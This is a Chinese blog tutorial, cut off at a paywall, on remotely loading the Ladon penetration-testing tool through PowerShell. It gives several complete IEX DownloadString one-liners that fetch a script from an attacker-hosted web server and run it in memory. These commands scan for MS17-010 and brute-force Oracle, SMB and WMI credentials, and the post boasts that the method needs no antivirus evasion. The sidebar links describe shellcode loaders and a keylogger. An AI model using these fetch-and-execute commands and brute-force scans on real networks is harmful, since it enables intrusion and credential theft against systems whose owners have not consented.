Ladon for PowerShell远程加载教程

最新推荐文章于 2023-01-04 14:25:43 发布
最新推荐文章于 2023-01-04 14:25:43 发布
阅读量711 收藏 1
点赞数
分类专栏: 内网渗透 远程命令
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/k8gege/article/details/107878987
版权

前言

本文仅是PowerLadon远程加载例子,并不代表只有这些功能。详情参考完整文档
脚本可直接远程内存加载使用无须免杀,或者有些人比较喜欢的所谓无文件渗透

完整文档:http://k8gege.org/Ladon

架设WEB服务器

使用命令 Ladon web 800 架设一个WEB服务器,用于远程下载脚本
实战可架设在VPS,或者架设在目标内网机器(因为有机器不能出网)
将脚本放在WEB目录下即可,当然大家也可以用IIS或APACHE搭建WEB

image

远程加载MS17010漏洞扫描

powershell “IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.1.3:800/Ladon6.6_all.ps1’); Ladon 192.168.1.8/24 MS17010”
image

远程加载Oracle弱口令爆破

powershell “IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.1.3:800/Ladon6.6_all.ps1’); Ladon 192.168.1.141 OracleScan”

远程加载SmbScan 445端口弱口令爆破

powershell “IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.1.3:800/Ladon6.6_all.ps1’); Ladon 192.168.1.141 SmbScan”
image

远程加载WmiScan 135端口弱口令爆破

powershell “IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.1.3:800/Ladon6.6_all.ps1’

最低0.47元/天 解锁文章
k8gege
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Powershell免杀(远程shellcode)笔记
jackslowf的博客
06-24 2164
原文链接 远程的思路很简单,只需要将bin文件放到cs服务器上,利用远程读取shellcode的方式将恶意代码到内存执行即可。 下面代码直接从uri读取字节数组(对的,没仔细看) # remoteshell.ps1 Set-StrictMode -Version 2 function get_delegate_type { Param ( [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_paramete
使用Powershell 远程执行
布谷鸟
03-03 3845
使用Powershell 远程执行
Win32下ShellCode的远程
CSDN
05-28 4932
如下Python代码是一个基本的键盘记录器,它使用了一些Windows API函数和第三方库来监视键盘活动,并记录按键、窗口切换和剪贴板操作。然后,它检测按键是否为常规按键,如果是,则输出按键字符。如果按下的是Ctrl+V,它会尝试获取剪贴板的内容并输出。函数是一个回调函数,用于处理键盘事件。它首先检测是否切换了窗口,如果切换了窗口,就调用。最后,它输出进程相关的信息。接下来,代码定义了一些全局变量和函数,包括。函数用于获取当前前台窗口的进程信息,以及。首先,代码导入了一些必要的库,包括。
免杀专题 (三)对loader进行远程
weixin_47224111的博客
12-30 1122
免杀专题 (三)对loader进行远程 上一篇写到的loader被各种杀软乱杀 import ctypes #shellcode def shellCodeLoad(shellcode): ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64 ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
Ladon简明教程 _ K8哥哥1
08-03
Ladon简明教程——全面的网络资产与安全扫描工具》 Ladon是一款功能强大的网络扫描工具,尤其在网络安全领域中,它被广泛用于资产发现、漏洞检测和弱口令扫描。本教程主要介绍Ladon的基本使用方法,包括它的核心...
Ladon-master.zip
06-16
Ladon一款用于大型内网渗透的多线程插件化综合扫描神器,含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描。
Ladon6.0_PowerShell_oracle_漏洞检测_目标检测_扫描器_快速目标检测_
10-03
Ladon6.0 PowerShell版,含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描。6.5版本内置70个功能模块
Aggressor:Ladon for Cobalt Strike、大型网络渗透扫描器、漏洞利用检测 MS17010 passwordbrute-forcepsexecatexecsshexecwebshel​​lsmbexecnetcatosscannetscanstruts2PocweblogicExp
05-31
Ladon for Cobalt Strike Ladon For Cobalt Strike Ladon 7.7 For Cobalt Strike 中文GUI 信息收集/存活主机/服务识别/端口扫描 高危漏洞检测 网络服务密码爆破 远程执行/横向移动 MSF、NC联动/一键反弹 程序简介 ...
Ladon5.8大型网络渗透扫描器&源码
12-15
Ladon一款用于大型网络渗透的多线程插件化综合扫描神器,含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描。5.7版本内置...
PowerShell远程安装MSI安装包、EXE可执行程序的方法
01-20
尽管对IT管理员或者开发者来讲,这是一个很常见的任务,但是在网上能找到“远程安装一个msi包或者exe应用程序”的相关文档还是比较少的。甚至有人在一些论坛的评论中写道,这不可能实现。事实上还是可以的。我会在本文提供两段代码,分别负责远程安装MSI包和EXE可执行应用程序。 一、安装MSI包 使用PowerShell调用WMI对象,你可以执行下面的脚本来安装你的MSI安装包: 代码如下:$box=”deviis01″ #this is the name of your server$product= [WMICLASS]”\\$box\ROOT\CIMV2:win32_Product”Write
远程与卸DLL
huobengle
08-27 83
DWORD GetProcessIdByName(LPCTSTR szProcess)//注意要exe后缀 { DWORD dwRet=0; HANDLE hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); PROCESSENTRY32 pe32; pe32.dwSize=sizeof(PROCESSENTRY32...
[网络]远程桌面自动程序
德仔
08-31 978
1.新建账号。 2.账号属性-环境;
6.通过axios远程远程BPMN
leyoliu的博客
01-04 356
现在将bpmnModeler.importXML()的bpmn参数改为远程服务器获取,使用axios异步获取,代码如下,重点关注这部分代码try...catch内部的相关代码。生产环境中,流程图一般存储在server端,需要通过http请求获取然后。使用流行的axios(ajax框架)来远程请求,使用npm i axios进行安装。npm run serve运行后访问,可以正常获取到远程的BPMN并正常
URLClassLoader远程jar包
lijianqingfeng的专栏
10-16 3460
背景 有一个网友看了我的《Flink的classLoader机制(推测)-- 记一次程序问题中的探索》这篇文章,向我提问了一个问题,虽然这个问题我没有解决,但是我打算做一个小实验来验证一下解决思路的可行性。问题如下: 实验 因为我现在没有一套随便实验的flink集群,也没有阿里云的oss,所以就只好做个最简单的实验,证明我是可以从远程jar包然后使用jar包中的类的。 首先,需要先创建一个maven工程,创建一个类叫...
动态远程Jar的实现方式
weixin_34074740的博客
04-16 565
2019独角兽企业重金招聘Python工程师标准>>> ...
bootstrap modal远程的两种方式
mengzuchao的专栏
07-31 4408
方法一: 使用链接   href属性 <a href="demo.jsp" data-toggle="modal" data-target="#mymodal">打开</a> 当点击该连接时,demo.jsp的内容就可以动态的到<div class="modal-content"></div>中。当然这里的
Ladon使用
weixin_47193338的博客
04-02 3462
一、简介 Ladon一款用于大型内网渗透的多线程插件化综合扫描神器,含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描。 二、下地址 https://codeload.github.com/k8gege/Ladon/zip/refs/heads/master 三、使用语句 目标主机进行存活探测、MAC地址探测及主机名探测 Ladon.exe 192.168.123.0/24 ON...
教程Ladon以指定用户权限运行程序或命令
K8哥哥
05-30 625
前言 Ladon内置Runas允许用户用其他权限运行指定的工具和程序。系统自带Runas命令需要交互式登陆,在webshell或不支持交互式的shell下使用麻烦。而Ladon的Runas则完美解决了以上问题,支持非交互式模拟登陆指定用户运行程序或命令。 应用场景 1.本机用户密码验证(权限不够读不到帐密或HASH的情况下,验证用户是否使用某个已知密码) 2.SYSTEM权限降权,SYS权限下以用户身份执行命令,实现会话穿透,或访问特定用户的DBAPI密数据 3.低权限用户提权,网络服务帐户或用户权限下使
x-ladon x-argus python
最新发布
09-18
X-Ladon和X-Argus是Python编程语言的两种库或框架。它们都是用于网络安全领域的工具,并且都提供了许多有用的功能。 X-Ladon是一个轻量级的Python库,用于开发和部署RESTful风格的Web服务。它旨在提供一种简单、可...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值